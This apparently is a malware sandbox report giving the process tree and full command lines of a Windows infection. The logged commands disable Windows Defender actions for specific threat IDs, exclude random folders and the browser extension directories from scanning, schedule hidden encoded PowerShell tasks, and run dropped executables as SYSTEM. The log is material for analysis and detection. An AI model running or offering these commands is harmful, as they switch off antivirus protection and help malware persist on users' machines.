C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;" | level 2 | PID 3684
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\SysWOW64\cmd.exe | "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32 | level 3 | PID 2296
-
C:\Windows\SysWOW64\reg.exe | REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32 | level 4 | PID 3164
-
C:\Windows\SysWOW64\reg.exe | "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64 | level 3 | PID 1980
-
C:\Windows\SysWOW64\reg.exe | "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32 | level 3 | PID 392
-
C:\Windows\SysWOW64\reg.exe | "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:64 | level 3 | PID 2804
-
C:\Windows\SysWOW64\reg.exe | "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:32 | level 3 | PID 3964
-
C:\Windows\SysWOW64\reg.exe | "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:64 | level 3 | PID 4016
-
C:\Windows\SysWOW64\reg.exe | "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:32 | level 3 | PID 2144
-
C:\Windows\SysWOW64\reg.exe | "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:64 | level 3 | PID 2708
-
C:\Windows\SysWOW64\reg.exe | "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:32 | level 3 | PID 3608
-
C:\Windows\SysWOW64\reg.exe | "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:64 | level 3 | PID 980
-
C:\Windows\SysWOW64\reg.exe | "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:32 | level 3 | PID 4500
-
C:\Windows\SysWOW64\reg.exe | "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:64 | level 3 | PID 3584
-
C:\Windows\SysWOW64\reg.exe | "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:32 | level 3 | PID 2220
-
C:\Windows\SysWOW64\reg.exe | "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:64 | level 3 | PID 1972
-
C:\Windows\SysWOW64\reg.exe | "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:32 | level 3 | PID 3984
-
C:\Windows\SysWOW64\reg.exe | "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:64 | level 3 | PID 4696
-
C:\Windows\SysWOW64\reg.exe | "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:32 | level 3 | PID 1456
-
C:\Windows\SysWOW64\reg.exe | "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:64 | level 3 | PID 900
-
C:\Windows\SysWOW64\reg.exe | "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:32 | level 3 | PID 5112
-
C:\Windows\SysWOW64\reg.exe | "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:64 | level 3 | PID 3280
-
C:\Windows\SysWOW64\reg.exe | "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:32 | level 3 | PID 3372
-
C:\Windows\SysWOW64\reg.exe | "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:64 | level 3 | PID 2248
-
C:\Windows\SysWOW64\reg.exe | "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:32 | level 3 | PID 384
-
C:\Windows\SysWOW64\reg.exe | "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:64 | level 3 | PID 4524
-
C:\Windows\SysWOW64\reg.exe | "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:32 | level 3 | PID 4672
-
C:\Windows\SysWOW64\reg.exe | "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:64 | level 3 | PID 4936
-
C:\Windows\SysWOW64\reg.exe | "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:32 | level 3 | PID 4256
-
C:\Windows\SysWOW64\reg.exe | "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:64 | level 3 | PID 3164
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\HwnzDfNzNWHpPtLDwZR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\HwnzDfNzNWHpPtLDwZR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ecOJmsgAHWlsC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ecOJmsgAHWlsC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\epoBtGYzqLvU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\epoBtGYzqLvU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\qIYKRzUEasUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\qIYKRzUEasUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\zgoZGMcaU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\zgoZGMcaU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\pICeQFkDCDDquYVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\pICeQFkDCDDquYVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\rhuXFflbMyLRQZzPf\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\rhuXFflbMyLRQZzPf\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\nlcUipsDcFbdntMB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\nlcUipsDcFbdntMB\" /t REG_DWORD /d 0 /reg:64;" | level 2 | PID 4820
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\System32\Conhost.exe | \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 | level 3 | PID 1980
-
C:\Windows\SysWOW64\cmd.exe | "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\HwnzDfNzNWHpPtLDwZR" /t REG_DWORD /d 0 /reg:32 | level 3 | PID 1992
-
C:\Windows\SysWOW64\reg.exe | REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\HwnzDfNzNWHpPtLDwZR" /t REG_DWORD /d 0 /reg:32 | level 4 | PID 3292
-
C:\Windows\SysWOW64\reg.exe | "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\HwnzDfNzNWHpPtLDwZR" /t REG_DWORD /d 0 /reg:64 | level 3 | PID 2956
-
C:\Windows\SysWOW64\reg.exe | "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ecOJmsgAHWlsC" /t REG_DWORD /d 0 /reg:32 | level 3 | PID 1020
-
C:\Windows\SysWOW64\reg.exe | "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ecOJmsgAHWlsC" /t REG_DWORD /d 0 /reg:64 | level 3 | PID 3984
-
C:\Windows\SysWOW64\reg.exe | "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\epoBtGYzqLvU2" /t REG_DWORD /d 0 /reg:32 | level 3 | PID 4696
-
C:\Windows\SysWOW64\reg.exe | "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\epoBtGYzqLvU2" /t REG_DWORD /d 0 /reg:64 | level 3 | PID 2320
-
C:\Windows\SysWOW64\reg.exe | "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\qIYKRzUEasUn" /t REG_DWORD /d 0 /reg:32 | level 3 | PID 72
-
C:\Windows\SysWOW64\reg.exe | "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\qIYKRzUEasUn" /t REG_DWORD /d 0 /reg:64 | level 3 | PID 496
-
C:\Windows\SysWOW64\reg.exe | "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\zgoZGMcaU" /t REG_DWORD /d 0 /reg:32 | level 3 | PID 236
-
C:\Windows\SysWOW64\reg.exe | "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\zgoZGMcaU" /t REG_DWORD /d 0 /reg:64 | level 3 | PID 4008
-
C:\Windows\SysWOW64\reg.exe | "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\pICeQFkDCDDquYVB /t REG_DWORD /d 0 /reg:32 | level 3 | PID 4584
-
C:\Windows\SysWOW64\reg.exe | "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\pICeQFkDCDDquYVB /t REG_DWORD /d 0 /reg:64 | level 3 | PID 4348
-
C:\Windows\SysWOW64\reg.exe | "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32 | level 3 | PID 3564
-
C:\Windows\SysWOW64\reg.exe | "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64 | level 3 | PID 3552
-
C:\Windows\SysWOW64\reg.exe | "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32 | level 3 | PID 3740
-
C:\Windows\SysWOW64\reg.exe | "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64 | level 3 | PID 4844
-
C:\Windows\SysWOW64\reg.exe | "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\rhuXFflbMyLRQZzPf /t REG_DWORD /d 0 /reg:32 | level 3 | PID 4832
-
C:\Windows\SysWOW64\reg.exe | "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\rhuXFflbMyLRQZzPf /t REG_DWORD /d 0 /reg:64 | level 3 | PID 2344
-
C:\Windows\SysWOW64\reg.exe | "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\nlcUipsDcFbdntMB /t REG_DWORD /d 0 /reg:32 | level 3 | PID 2720
-
C:\Windows\SysWOW64\reg.exe | "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\nlcUipsDcFbdntMB /t REG_DWORD /d 0 /reg:64 | level 3 | PID 3928
-
C:\Windows\SysWOW64\schtasks.exe | schtasks /CREATE /TN "glZmftfLp" /SC once /ST 04:41:21 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==" | level 2 | PID 3356
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exe | schtasks /run /I /tn "glZmftfLp" | level 2 | PID 404
-
C:\Windows\System32\Conhost.exe | \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 | level 3 | PID 2144
-
C:\Windows\SysWOW64\schtasks.exe | schtasks /DELETE /F /TN "glZmftfLp" | level 2 | PID 2732
-
C:\Windows\SysWOW64\schtasks.exe | schtasks /CREATE /TN "yfARWRprRqUFWeTGf" /SC once /ST 07:20:25 /RU "SYSTEM" /TR "\"C:\Windows\Temp\nlcUipsDcFbdntMB\LDIxkfUBXQlUStg\ZilJVJq.exe\" aV /iRHVdidlr 385118 /S" /V1 /F | level 2 | PID 560
- Drops file in Windows directory
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exe | schtasks /run /I /tn "yfARWRprRqUFWeTGf" | level 2 | PID 4788
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA== | level 1 | PID 4224
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\System32\Conhost.exe | \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 | level 2 | PID 3292
-
C:\Windows\system32\gpupdate.exe | "C:\Windows\system32\gpupdate.exe" /force | level 2 | PID 236
-
C:\Windows\System32\Conhost.exe | \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 | level 3 | PID 1152
-
C:\Windows\system32\gpscript.exe | gpscript.exe /RefreshSystemParam | level 1 | PID 4236
-
C:\Users\Admin\AppData\Local\Temp\1000150001\NewB.exe | C:\Users\Admin\AppData\Local\Temp\1000150001\NewB.exe | level 1 | PID 2772
- Executes dropped EXE
-
C:\Users\Admin\AppData\Roaming\explorer.exe | C:\Users\Admin\AppData\Roaming\explorer.exe | level 1 | PID 3896
- Executes dropped EXE
-
C:\Windows\Temp\nlcUipsDcFbdntMB\LDIxkfUBXQlUStg\ZilJVJq.exe | C:\Windows\Temp\nlcUipsDcFbdntMB\LDIxkfUBXQlUStg\ZilJVJq.exe aV /iRHVdidlr 385118 /S | level 1 | PID 1456
- Checks computer location settings
- Executes dropped EXE
- Drops Chrome extension
- Drops desktop.ini file(s)
- Drops file in System32 directory
- Drops file in Program Files directory
- Modifies data under HKEY_USERS
-
C:\Windows\SysWOW64\cmd.exe | "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force" | level 2 | PID 4500
-
C:\Windows\SysWOW64\forfiles.exe | forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" | level 3 | PID 684
-
C:\Windows\SysWOW64\cmd.exe | /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 | level 4 | PID 2152
-
\??\c:\windows\SysWOW64\reg.exe | reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 | level 5 | PID 3908
-
C:\Windows\SysWOW64\forfiles.exe | forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" | level 3 | PID 2956
-
C:\Windows\SysWOW64\cmd.exe | /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6 | level 4 | PID 4492
-
\??\c:\windows\SysWOW64\reg.exe | reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6 | level 5 | PID 4236
-
C:\Windows\SysWOW64\forfiles.exe | forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" | level 3 | PID 3756
-
C:\Windows\SysWOW64\cmd.exe | /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6 | level 4 | PID 4624
-
\??\c:\windows\SysWOW64\reg.exe | reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6 | level 5 | PID 3164
-
C:\Windows\SysWOW64\forfiles.exe | forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" | level 3 | PID 2344
-
